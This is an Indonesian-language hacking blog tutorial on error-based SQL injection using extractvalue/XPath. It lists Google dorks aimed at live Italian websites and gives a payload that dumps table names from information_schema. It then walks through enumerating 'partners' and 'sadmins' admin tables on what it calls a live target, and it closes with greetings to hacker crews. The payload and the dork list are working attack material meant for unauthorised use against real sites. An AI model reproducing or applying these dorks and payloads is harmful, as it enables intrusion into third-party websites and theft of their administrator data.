Tutorial SQLI to Xpath (bug partners/sadmins
Maret 27, 2021
Tutorial SQLI to Xpath bug (partners/sadmins)
Oleh LazyGans
Assalamualaikum hallo gan balik lagi sama gua kali ini gua bakal kasih tutorial SQLI to Xpath (bug partners/sadmins) siapkan bahan bahan nya
-Dork/Chall
-payload
Di sini gua make live target ya buat live target nya Klik Gw
Dork:
inurl:camere-dettaglio.php?id= site:.it inurl:restaurant-news-detail.php?id= site:.it inurl:rooms-suites.php?id= site:.it inurl:room.php?id= site:.it inurl:rooms-suites.php?id= site:.it
(Kembangin lagi)
Payload:
'+and extractvalue(0x0a,concat(0x0a,nick kalian dengan hex code,(select table_name from information_schema.tables where table_schema=database() limit 0,1)))--+-
Nick yang sudah kalian ubah jadi hex code tambahin 0x di depan nya ya
Oke gas langsung ke target
Oke langsung aja lanjut kasih tanda ' di belakang parameter
Berhubung web nya vuln, langsung kita kasih payload nya ya
Contoh Klik Gw
Nah.. Tugas kita mencari partners dan sadmins nya ya?
Lanjut
Kita tambahin 1.1 di belakang payload.
Contoh Klik Gw
Nah, diangka 1.1 partners nya belum ketemu
Kita tambahin aja terus sampai ada tulisan partners
2.1
3.1
4.1
Dan seterusnya
Nah, diangka 10.1 partners nya ketemu
Next kita mencari sadmins nya.
Sama caranya dengan mencari partner ya
Tambahin 11.1-12.1 dan seterusnya sampai sadmins selesai
Dan Done!!!!!
sadmins ada di angka 13.1
Hasil Klik Gw
Nah oke segitu aja tutor dari gw semoga bermanfaat sekian dan terimakasih
Thanks To:
-All Member Indonesia Cyber Nightmare
-Black Brotherhood
-SevenGhost666
-Eagle Xploiter
-Doraemon Cyber Team
#Happy Learn